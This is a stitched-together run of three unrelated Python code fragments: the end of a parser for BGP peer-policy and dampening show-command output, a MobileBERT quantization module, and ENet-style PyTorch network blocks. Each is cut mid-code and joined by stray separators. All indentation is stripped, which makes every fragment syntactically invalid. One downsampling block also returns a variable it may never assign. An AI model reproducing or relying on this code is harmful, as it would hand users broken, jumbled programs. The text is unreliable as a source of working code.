' +restart +(?P<maximum_prefix_restart>[0-9]+)$')
p10 = re.compile(r'^\s*as-override$')
p11 = re.compile(r'^\s*allowas-in +(?P<allowas_in_as_number>[0-9]+)$')
p12 = re.compile(r'^\s*route-reflector-client$')
p13 = re.compile(r'^\s*next-hop-self$')
p14 = re.compile(r'^\s*send-community +(?P<send_community>[\w]+)$')
p15 = re.compile(r'^\s*soo +(?P<soo>[\w\:\d]+)$')
p16 = re.compile(r'^\s*Inherited policies:$')
# Init vars
parsed_dict = {}
for line in out.splitlines():
if line.strip():
line = line.rstrip()
else:
continue
# Template:PEER-POLICY, index:1.
m = p1.match(line)
if m:
template_id = m.groupdict()['template_id']
index = int(m.groupdict()['index'])
if 'peer_policy' not in parsed_dict:
parsed_dict['peer_policy'] = {}
if template_id not in parsed_dict['peer_policy']:
parsed_dict['peer_policy'][template_id] = {}
parsed_dict['peer_policy'][template_id]['index'] = index
continue
# Local policies:0x8002069C603, Inherited polices:0x0
m = p2.match(line)
if m:
local_policy = m.groupdict()['local_policies']
inherited_policy = m.groupdict()['inherited_polices']
parsed_dict['peer_policy'][template_id]['local_policies'] = local_policy
parsed_dict['peer_policy'][template_id]['inherited_polices'] = inherited_policy
continue
# Local disable policies:0x0, Inherited disable policies:0x0
m = p3.match(line)
if m:
local_policy = m.groupdict()['local_disable_policies']
inherited_policy = m.groupdict()['inherited_disable_polices']
parsed_dict['peer_policy'][template_id]['local_disable_policies'] = local_policy
parsed_dict['peer_policy'][template_id]['inherited_disable_polices'] = inherited_policy
continue
#Locally configured policies:
m = p4.match(line)
if m:
flag = False
continue
# route-map test in
m = p5.match(line)
if m:
route_map_in = m.groupdict()['remote_map_in']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies'] \
['route_map_name_in'] = route_map_in
else:
parsed_dict['peer_policy'][template_id]['route_map_name_in'] = route_map_in
continue
# route-map test2 out
m = p6.match(line)
if m:
route_map_out = m.groupdict()['route_map_out']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['route_map_name_out'] = route_map_out
else:
parsed_dict['peer_policy'][template_id]['route_map_name_out'] = route_map_out
continue
# default-originate route-map test
m = p7.match(line)
if m:
default_originate_route_map = m.groupdict()['default_originate_route_map']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['default_originate'] = True
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['default_originate_route_map'] = default_originate_route_map
else:
parsed_dict['peer_policy'][template_id]['default_originate'] = True
parsed_dict['peer_policy'][template_id]['default_originate_route_map'] = \
default_originate_route_map
continue
# soft-reconfiguration inbound
m = p8.match(line)
if m:
default_originate = m.groupdict()['soft_reconfiguration']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['soft_reconfiguration'] \
= True
else:
parsed_dict['peer_policy'][template_id]['soft_reconfiguration'] \
= True
continue
# maximum-prefix 5555 70 restart 300
m = p9.match(line)
if m:
maximum_prefix_max_prefix_no = int(m.groupdict()['maximum_prefix_max_prefix_no'])
maximum_prefix_restart = int(m.groupdict()['maximum_prefix_restart'])
maximum_prefix_threshold = m.groupdict()['maximum_prefix_threshold']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['maximum_prefix_max_prefix_no'] \
= maximum_prefix_max_prefix_no
if maximum_prefix_threshold:
parsed_dict['peer_policy'][template_id]['inherited_policies']['maximum_prefix_threshold'] \
= int(maximum_prefix_threshold)
parsed_dict['peer_policy'][template_id]['inherited_policies']['maximum_prefix_restart'] \
= maximum_prefix_restart
else:
parsed_dict['peer_policy'][template_id]['maximum_prefix_max_prefix_no'] \
= maximum_prefix_max_prefix_no
if maximum_prefix_threshold:
parsed_dict['peer_policy'][template_id]['maximum_prefix_threshold'] \
= int(maximum_prefix_threshold)
parsed_dict['peer_policy'][template_id]['maximum_prefix_restart'] \
= maximum_prefix_restart
continue
# as-override
m = p10.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['as_override'] = True
else:
parsed_dict['peer_policy'][template_id]['as_override'] = True
continue
# allowas-in 9
m = p11.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['allowas_in'] = True
parsed_dict['peer_policy'][template_id]['inherited_policies']['allowas_in_as_number'] = \
int(m.groupdict()['allowas_in_as_number'])
else:
parsed_dict['peer_policy'][template_id]['allowas_in'] = True
parsed_dict['peer_policy'][template_id]['allowas_in_as_number'] = \
int(m.groupdict()['allowas_in_as_number'])
continue
# route-reflector-client
m = p12.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['route_reflector_client'] = True
else:
parsed_dict['peer_policy'][template_id]['route_reflector_client'] = True
continue
# next-hop-self
m = p13.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['next_hop_self'] = True
else:
parsed_dict['peer_policy'][template_id]['next_hop_self'] = True
continue
# send-community both
m = p14.match(line)
if m:
send_community = m.groupdict()['send_community']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['send_community'] = send_community
else:
parsed_dict['peer_policy'][template_id]['send_community'] = send_community
continue
# soo SoO:100:100
m = p15.match(line)
if m:
soo = m.groupdict()['soo']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['soo'] = soo
else:
parsed_dict['peer_policy'][template_id]['soo'] = soo
continue
# Inherited policies:
m = p16.match(line)
if m:
if 'inherited_policies' not in parsed_dict['peer_policy'][template_id]:
parsed_dict['peer_policy'][template_id]['inherited_policies'] = {}
flag = True
continue
if parsed_dict:
for key, value in parsed_dict['peer_policy'].items():
if 'inherited_policies' in parsed_dict['peer_policy'][key]:
if not len(parsed_dict['peer_policy'][key]['inherited_policies']):
del parsed_dict['peer_policy'][key]['inherited_policies']
return parsed_dict
#-------------------------------------------------------------------------------
# ==========================================
# Schema for:
# * 'show ip bgp all dampening parameters'
# ==========================================
class ShowIpBgpAllDampeningParametersSchema(MetaParser):
''' Schema for "show ip bgp all dampening parameters" '''
schema = {
'vrf':
{Any():
{Optional('address_family'):
{Any():
{Optional('dampening'): bool,
Optional('dampening_decay_time'): int,
Optional('dampening_half_life_time'): int,
Optional('dampening_reuse_time'): int,
Optional('dampening_max_suppress_penalty'): int,
Optional('dampening_suppress_time'): int,
Optional('dampening_max_suppress_time'): int,
},
},
},
},
}
# ==========================================
# Parser for:
# * 'show ip bgp all dampening parameters'
# ==========================================
class ShowIpBgpAllDampeningParameters(ShowIpBgpAllDampeningParametersSchema):
''' Parser for "show ip bgp all dampening parameters" '''
cli_command = 'show ip bgp all dampening parameters'
def cli(self, output=None):
if output is None:
out = self.device.execute(self.cli_command)
else:
out = output
p1 = re.compile(r'^\s*For +address +family:'
' +(?P<address_family>[a-zA-Z0-9\-\s]+)$')
p2 = re.compile(r'^\s*dampening'
' +(?P<dampening_val>[\d\s\S]+)$')
p3 = re.compile(r'^\s*Half-life +time\s*:'
' +(?P<half_life_time>[\d]+)'
' mins +Decay +Time +: +(?P<decay_time>[\d]+) +secs$')
p4 = re.compile(r'^\s*Max +suppress +penalty:'
'\s+(?P<max_suppress_penalty>[0-9]+)'
'\s+Max +suppress +time:\s+(?P<max_suppress_time>[\d]+) +mins$')
p5 = re.compile(r'^\s*Suppress +penalty +:'
' +(?P<suppress_penalty>[\d]+)'
' +Reuse +penalty +: +(?P<reuse_penalty>[\d]+)$')
p6 = re.compile(r'^\s*% +dampening +not +enabled +for +base$')
p7 = re.compile(r'^\s*For +vrf: +(?P<vrf_name>[\w\d]+)$')
p8 = re.compile(r'^\s*% +dampening +not +enabled +for +vrf +(?P<vrf_name>[\d\w]+)$')
# Init vars
parsed_dict = {}
vrf_name = 'default'
for line in out.splitlines():
if line.strip():
line = line.rstrip()
else:
continue
# For address family: IPv4 Unicast
m = p1.match(line)
if m:
af_name = m.groupdict()['address_family'].lower()
if 'vrf' not in parsed_dict:
parsed_dict['vrf'] = {}
if vrf_name not in parsed_dict['vrf']:
parsed_dict['vrf'][vrf_name] = {}
if 'address_family' not in parsed_dict['vrf'][vrf_name]:
parsed_dict['vrf'][vrf_name]['address_family'] = {}
if af_name not in parsed_dict['vrf'][vrf_name]['address_family']:
parsed_dict['vrf'][vrf_name]['address_family'][af_name] = {}
continue
# dampening 35 200 200 70
m = p2.match(line)
if m:
dampening_val = m.groupdict()['dampening_val']
if vrf_name not in parsed_dict['vrf']:
parsed_dict['vrf'][vrf_name] = {}
if 'address_family' not in parsed_dict['vrf'][vrf_name]:
parsed_dict['vrf'][vrf_name]['address_family'] = {}
if af_name not in parsed_dict['vrf'][vrf_name]['address_family']:
parsed_dict['vrf'][vrf_name]['address_family'][af_name] = {}
parsed_dict['vrf'][vrf_name]['address_family'][af_name]['dampening'] = True
continue
# Half-life time : 35 mins Decay Time : 4200 secs
m = p3.match(line)
if m:
half_life_time = int(m.groupdict()['half_life_time'])*60
decay_time = int(m.groupdict()['decay_time'])
| |
<reponame>Ayyub29/transformer-quantization<gh_stars>1-10
# Copyright (c) 2021 Qualcomm Technologies, Inc.
# All Rights Reserved.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.models.mobilebert.modeling_mobilebert import (
BaseModelOutputWithPooling,
BottleneckLayer,
FFNLayer,
MobileBertLayer,
MobileBertSelfAttention,
MobileBertSelfOutput,
NoNorm,
)
from transformers.modeling_outputs import SequenceClassifierOutput
from transformers.modeling_utils import ModuleUtilsMixin
from quantization.autoquant_utils import quantize_model, quantize_module_list
from quantization.base_quantized_classes import QuantizedActivation, FP32Acts
from quantization.base_quantized_model import QuantizedModel
from quantization.hijacker import QuantizationHijacker
from quantization.range_estimators import RangeEstimators, OptMethod
from utils.tb_utils import _tb_advance_global_step, _tb_advance_token_counters, _tb_hist
from utils.utils import DotDict
DEFAULT_QUANT_DICT = {
# Embeddings
'sum_input_pos_embd': True,
'sum_token_type_embd': True,
# Attention
'attn_scores': True,
'attn_probs': True,
'attn_probs_n_bits_act': None,
'attn_probs_act_range_method': None,
'attn_probs_act_range_options': None,
'attn_output': True,
# Residual connections
'res_self_output': True,
'res_output': True,
'res_output_bottleneck': True,
'res_ffn_output': True,
}
def _make_quant_dict(partial_dict):
quant_dict = DEFAULT_QUANT_DICT.copy()
quant_dict.update(partial_dict)
return DotDict(quant_dict)
class QuantNoNorm(QuantizationHijacker):
def __init__(self, org_model, *args, activation=None, **kwargs):
super().__init__(*args, activation=activation, **kwargs)
self.weight = org_model.weight
self.bias = org_model.bias
def forward(self, x, offsets=None):
weight, bias = self.weight, self.bias
if self._quant_w:
weight = self.weight_quantizer(weight)
bias = self.weight_quantizer(bias)
res = x * weight + bias
res = self.quantize_activations(res)
return res
class QuantizedMobileBertEmbeddings(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.trigram_input = org_model.trigram_input
self.embedding_size = org_model.embedding_size
self.hidden_size = org_model.hidden_size
# quantized modules
self.word_embeddings = quantize_model(org_model.word_embeddings, **quant_params)
self.position_embeddings = quantize_model(org_model.position_embeddings, **quant_params)
self.token_type_embeddings = quantize_model(org_model.token_type_embeddings, **quant_params)
self.embedding_transformation = quantize_model(
org_model.embedding_transformation, **quant_params
)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
self.dropout = org_model.dropout
position_ids = org_model.position_ids
if position_ids is not None:
self.register_buffer('position_ids', position_ids)
else:
self.position_ids = position_ids
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.sum_input_pos_embd_act_quantizer = (
QuantizedActivation(**quant_params)
if self.quant_dict.sum_input_pos_embd
else FP32Acts()
)
self.sum_token_type_embd_act_quantizer = (
QuantizedActivation(**quant_params)
if self.quant_dict.sum_token_type_embd
else FP32Acts()
)
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
if token_type_ids is None:
token_type_ids = torch.zeros(
input_shape, dtype=torch.long, device=self.position_ids.device
)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids) # (B, T, 128)
if self.trigram_input:
# From the paper MobileBERT: a Compact Task-Agnostic BERT for Resource-Limited
# Devices (https://arxiv.org/abs/2004.02984)
#
# The embedding table in BERT models accounts for a substantial proportion of model size. To compress
# the embedding layer, we reduce the embedding dimension to 128 in MobileBERT.
# Then, we apply a 1D convolution with kernel size 3 on the raw token embedding to produce a 512
# dimensional output.
inputs_embeds = torch.cat(
[
F.pad(inputs_embeds[:, 1:], [0, 0, 0, 1, 0, 0], value=0),
inputs_embeds,
F.pad(inputs_embeds[:, :-1], [0, 0, 1, 0, 0, 0], value=0),
],
dim=2,
) # (B, T, 384)
if self.trigram_input or self.embedding_size != self.hidden_size:
inputs_embeds = self.embedding_transformation(inputs_embeds) # (B, T, 512)
# Add positional embeddings and token type embeddings, then layer # normalize and
# perform dropout.
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = self.sum_input_pos_embd_act_quantizer(inputs_embeds + position_embeddings)
embeddings = self.sum_token_type_embd_act_quantizer(embeddings + token_type_embeddings)
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class QuantizedMobileBertSelfAttention(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.num_attention_heads = org_model.num_attention_heads
self.attention_head_size = org_model.attention_head_size
self.all_head_size = org_model.all_head_size
# quantized modules
self.query = quantize_model(org_model.query, **quant_params)
self.key = quantize_model(org_model.key, **quant_params)
self.value = quantize_model(org_model.value, **quant_params)
self.dropout = org_model.dropout
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.attn_scores_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.attn_scores else FP32Acts()
)
quant_params_ = quant_params.copy()
if self.quant_dict.attn_probs_n_bits_act is not None:
quant_params_['n_bits_act'] = self.quant_dict.attn_probs_n_bits_act
if self.quant_dict.attn_probs_act_range_method is not None:
quant_params_['act_range_method'] = RangeEstimators[
self.quant_dict.attn_probs_act_range_method
]
if self.quant_dict.attn_probs_act_range_options is not None:
act_range_options = self.quant_dict.attn_probs_act_range_options
if 'opt_method' in act_range_options and not isinstance(act_range_options['opt_method'],
OptMethod):
act_range_options['opt_method'] = OptMethod[act_range_options['opt_method']]
quant_params_['act_range_options'] = act_range_options
self.attn_probs_act_quantizer = (
QuantizedActivation(**quant_params_) if self.quant_dict.attn_probs else FP32Acts()
)
self.attn_output_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.attn_output else FP32Acts()
)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
query_tensor,
key_tensor,
value_tensor,
attention_mask=None,
head_mask=None,
output_attentions=None,
):
mixed_query_layer = self.query(query_tensor)
mixed_key_layer = self.key(key_tensor)
mixed_value_layer = self.value(value_tensor)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = self.attn_scores_act_quantizer(attention_scores)
# NOTE: factor 1/d^0.5 can be absorbed into the previous act. quant. delta
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
attention_probs = self.attn_probs_act_quantizer(attention_probs)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = self.attn_output_act_quantizer(context_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
class QuantizedMobileBertSelfOutput(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.use_bottleneck = org_model.use_bottleneck
# quantized modules
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
if not self.use_bottleneck:
self.dropout = org_model.dropout
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.res_self_output else FP32Acts()
)
def forward(self, hidden_states, residual_tensor):
layer_outputs = self.dense(hidden_states)
if not self.use_bottleneck:
layer_outputs = self.dropout(layer_outputs)
_tb_advance_token_counters(self, layer_outputs)
_tb_hist(self, layer_outputs, 'res_self_output_h')
_tb_hist(self, residual_tensor, 'res_self_output_x')
layer_outputs = layer_outputs + residual_tensor
_tb_hist(self, residual_tensor, 'res_self_output_x_h')
layer_outputs = self.res_act_quantizer(layer_outputs)
layer_outputs = self.LayerNorm(layer_outputs)
_tb_advance_global_step(self)
return layer_outputs
def quantize_intermediate(org_module, **quant_params):
m_dense = org_module.dense
m_act = org_module.intermediate_act_fn
if not isinstance(m_act, nn.Module):
if m_act == F.gelu:
m_act = nn.GELU()
elif m_act == F.relu:
m_act = nn.ReLU()
else:
raise NotImplementedError()
return quantize_model(nn.Sequential(m_dense, m_act), **quant_params)
class QuantizedOutputBottleneck(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
self.dropout = org_model.dropout
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params)
if self.quant_dict.res_output_bottleneck
else FP32Acts()
)
def forward(self, hidden_states, residual_tensor):
layer_outputs = self.dense(hidden_states)
layer_outputs = self.dropout(layer_outputs)
_tb_advance_token_counters(self, layer_outputs)
_tb_hist(self, layer_outputs, 'res_layer_h')
_tb_hist(self, residual_tensor, 'res_layer_x')
layer_outputs = layer_outputs + residual_tensor
_tb_hist(self, layer_outputs, 'res_layer_x_h')
layer_outputs = self.res_act_quantizer(layer_outputs)
layer_outputs = self.LayerNorm(layer_outputs)
_tb_advance_global_step(self)
return layer_outputs
class QuantizedMobileBertOutput(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.use_bottleneck = org_model.use_bottleneck
# quantized modules
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
if not self.use_bottleneck:
self.dropout = org_model.dropout
else:
self.bottleneck = QuantizedOutputBottleneck(
org_model=org_model.bottleneck, **quant_params
)
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.res_output else FP32Acts()
)
def forward(self, intermediate_states, residual_tensor_1, residual_tensor_2):
layer_output = self.dense(intermediate_states)
if not self.use_bottleneck:
layer_output = self.dropout(layer_output)
layer_output = layer_output + residual_tensor_1
layer_output = self.res_act_quantizer(layer_output)
layer_output = self.LayerNorm(layer_output)
else:
_tb_advance_token_counters(self, layer_output)
_tb_hist(self, layer_output, 'res_interm_h')
_tb_hist(self, residual_tensor_1, 'res_interm_x')
layer_output = layer_output + residual_tensor_1
_tb_hist(self, layer_output, 'res_interm_x_h')
layer_output = self.res_act_quantizer(layer_output)
layer_output = self.LayerNorm(layer_output)
layer_output = self.bottleneck(layer_output, residual_tensor_2)
_tb_advance_global_step(self)
return layer_output
class QuantizedBottleneckLayer(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
def forward(self, hidden_states):
layer_input = self.dense(hidden_states)
layer_input = self.LayerNorm(layer_input)
return layer_input
class QuantizedFFNOutput(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.res_ffn_output else FP32Acts()
)
def forward(self, hidden_states, residual_tensor):
layer_outputs = self.dense(hidden_states)
_tb_advance_token_counters(self, layer_outputs)
num_ffn = self.ffn_idx + 1
_tb_hist(self, layer_outputs, f'res_ffn{num_ffn}_h')
_tb_hist(self, residual_tensor, f'res_ffn{num_ffn}_x')
layer_outputs = layer_outputs + residual_tensor
_tb_hist(self, layer_outputs, f'res_ffn{num_ffn}_x_h')
layer_outputs = self.res_act_quantizer(layer_outputs)
layer_outputs = self.LayerNorm(layer_outputs)
_tb_advance_global_step(self)
return layer_outputs
class QuantizedFFNLayer(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.intermediate = quantize_intermediate(org_model.intermediate, **quant_params)
self.output = QuantizedFFNOutput(org_model.output, **quant_params)
def forward(self, hidden_states):
intermediate_output = self.intermediate(hidden_states)
layer_outputs = self.output(intermediate_output, hidden_states)
return layer_outputs
class QuantizedMobileBertLayer(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy
self.use_bottleneck = org_model.use_bottleneck
self.num_feedforward_networks = org_model.num_feedforward_networks
# quantized modules
attention_specials = {
MobileBertSelfAttention: QuantizedMobileBertSelfAttention,
MobileBertSelfOutput: QuantizedMobileBertSelfOutput,
}
self.attention = quantize_model(
org_model.attention, specials=attention_specials, **quant_params
)
self.intermediate = quantize_intermediate(org_model.intermediate, **quant_params)
self.output = QuantizedMobileBertOutput(org_model.output, **quant_params)
if self.use_bottleneck:
self.bottleneck = quantize_model(
org_model.bottleneck,
specials={BottleneckLayer: QuantizedBottleneckLayer},
**quant_params,
)
if getattr(org_model, 'ffn', None) is not None:
self.ffn = quantize_module_list(
org_model.ffn, specials={FFNLayer: QuantizedFFNLayer}, **quant_params
)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
output_attentions=None,
):
if self.use_bottleneck:
query_tensor, key_tensor, value_tensor, layer_input = self.bottleneck(hidden_states)
else:
query_tensor, key_tensor, value_tensor, layer_input = [hidden_states] * 4
self_attention_outputs = self.attention(
query_tensor,
key_tensor,
value_tensor,
layer_input,
attention_mask,
head_mask,
output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
s = (attention_output,)
outputs | |
import torch.nn as nn
import torch
from torch.autograd import Variable
class InitialBlock(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size=3,
padding=0,
bias=False,
relu=True):
super(InitialBlock,self).__init__()
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - As stated above the number of output channels for this
# branch is the total minus 3, since the remaining channels come from
# the extension branch
self.main_branch = nn.Conv2d(
in_channels,
out_channels - 3,
kernel_size=kernel_size,
stride=2,
padding=padding,
bias=bias)
# Extension branch
self.ext_branch = nn.MaxPool2d(kernel_size, stride=2, padding=padding)
# Initialize batch normalization to be used after concatenation
self.batch_norm = nn.BatchNorm2d(out_channels)
# PReLU layer to apply after concatenating the branches
self.out_prelu = activation
def forward(self, x):
main = self.main_branch(x)
ext = self.ext_branch(x)
# Concatenate branches
out = torch.cat((main, ext), 1)
# Apply batch normalization
out = self.batch_norm(out)
return self.out_prelu(out)
class RegularBottleneck(nn.Module):
def __init__(self,
channels,
internal_ratio=4,
kernel_size=3,
padding=0,
dilation=1,
asymmetric=False,
dropout_prob=0,
bias=False,
relu=True):
super(RegularBottleneck,self).__init__()
# Check in the internal_scale parameter is within the expected range
# [1, channels]
if internal_ratio <= 1 or internal_ratio > channels:
raise RuntimeError("Value out of range. Expected value in the "
"interval [1, {0}], got internal_scale={1}."
.format(channels, internal_ratio))
internal_channels = channels // internal_ratio
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - shortcut connection
# Extension branch - 1x1 convolution, followed by a regular, dilated or
# asymmetric convolution, followed by another 1x1 convolution, and,
# finally, a regularizer (spatial dropout). Number of channels is constant.
# 1x1 projection convolution
self.ext_conv1 = nn.Sequential(
nn.Conv2d(
channels,
internal_channels,
kernel_size=1,
stride=1,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# If the convolution is asymmetric we split the main convolution in
# two. Eg. for a 5x5 asymmetric convolution we have two convolution:
# the first is 5x1 and the second is 1x5.
if asymmetric:
self.ext_conv2 = nn.Sequential(
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=(kernel_size, 1),
stride=1,
padding=(padding, 0),
dilation=dilation,
bias=bias), nn.BatchNorm2d(internal_channels), activation,
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=(1, kernel_size),
stride=1,
padding=(0, padding),
dilation=dilation,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
else:
self.ext_conv2 = nn.Sequential(
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=kernel_size,
stride=1,
padding=padding,
dilation=dilation,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# 1x1 expansion convolution
self.ext_conv3 = nn.Sequential(
nn.Conv2d(
internal_channels,
channels,
kernel_size=1,
stride=1,
bias=bias), nn.BatchNorm2d(channels), activation)
self.ext_regul = nn.Dropout2d(p=dropout_prob)
# PReLU layer to apply after adding the branches
self.out_prelu = activation
def forward(self, x):
# Main branch shortcut
main = x
# Extension branch
ext = self.ext_conv1(x)
ext = self.ext_conv2(ext)
ext = self.ext_conv3(ext)
ext = self.ext_regul(ext)
# Add main and extension branches
out = main + ext
return self.out_prelu(out)
class DownsamplingBottleneck(nn.Module):
def __init__(self,
in_channels,
out_channels,
internal_ratio=4,
kernel_size=3,
padding=0,
return_indices=False,
dropout_prob=0,
bias=False,
relu=True):
super(DownsamplingBottleneck,self).__init__()
# Store parameters that are needed later
self.return_indices = return_indices
# Check in the internal_scale parameter is within the expected range
# [1, channels]
if internal_ratio <= 1 or internal_ratio > in_channels:
raise RuntimeError("Value out of range. Expected value in the "
"interval [1, {0}], got internal_scale={1}. "
.format(in_channels, internal_ratio))
internal_channels = in_channels // internal_ratio
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - max pooling followed by feature map (channels) padding
self.main_max1 = nn.MaxPool2d(
kernel_size,
stride=2,
padding=padding,
return_indices=return_indices)
# Extension branch - 2x2 convolution, followed by a regular, dilated or
# asymmetric convolution, followed by another 1x1 convolution. Number
# of channels is doubled.
# 2x2 projection convolution with stride 2
self.ext_conv1 = nn.Sequential(
nn.Conv2d(
in_channels,
internal_channels,
kernel_size=2,
stride=2,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# Convolution
self.ext_conv2 = nn.Sequential(
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=kernel_size,
stride=1,
padding=padding,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# 1x1 expansion convolution
self.ext_conv3 = nn.Sequential(
nn.Conv2d(
internal_channels,
out_channels,
kernel_size=1,
stride=1,
bias=bias), nn.BatchNorm2d(out_channels), activation)
self.ext_regul = nn.Dropout2d(p=dropout_prob)
# PReLU layer to apply after concatenating the branches
self.out_prelu = activation
def forward(self, x):
# Main branch shortcut
if self.return_indices:
main, max_indices = self.main_max1(x)
else:
main = self.main_max1(x)
# Extension branch
ext = self.ext_conv1(x)
ext = self.ext_conv2(ext)
ext = self.ext_conv3(ext)
ext = self.ext_regul(ext)
# Main branch channel padding
n, ch_ext, h, w = ext.size()
ch_main = main.size()[1]
padding = Variable(torch.zeros(n, ch_ext - ch_main, h, w))
# Before concatenating, check if main is on the CPU or GPU and
# convert padding accordingly
if main.is_cuda:
padding = padding.cuda()
# Concatenate
main = torch.cat((main, padding), 1)
# Add main and extension branches
out = main + ext
return self.out_prelu(out), max_indices
class UpsamplingBottleneck(nn.Module):
def __init__(self,
in_channels,
out_channels,
internal_ratio=4,
kernel_size=3,
padding=0,
dropout_prob=0,
bias=False,
relu=True):
super(UpsamplingBottleneck,self).__init__()
# Check in the internal_scale parameter is within the expected range
# [1, channels]
if internal_ratio <= 1 or internal_ratio > in_channels:
raise RuntimeError("Value out of range. Expected value in the "
"interval [1, {0}], got internal_scale={1}. "
.format(in_channels, internal_ratio))
internal_channels = in_channels // internal_ratio
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - max pooling followed by feature map (channels) padding
self.main_conv1 = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=bias),
nn.BatchNorm2d(out_channels))
# Remember that the stride is the same as the kernel_size, just like
# the max pooling layers
self.main_unpool1 = nn.MaxUnpool2d(kernel_size=2)
# Extension branch - 1x1 convolution, followed by a regular, dilated or
# asymmetric convolution, followed by another 1x1 convolution. Number
# of channels is doubled.
# 1x1 projection convolution with stride 1
self.ext_conv1 = nn.Sequential(
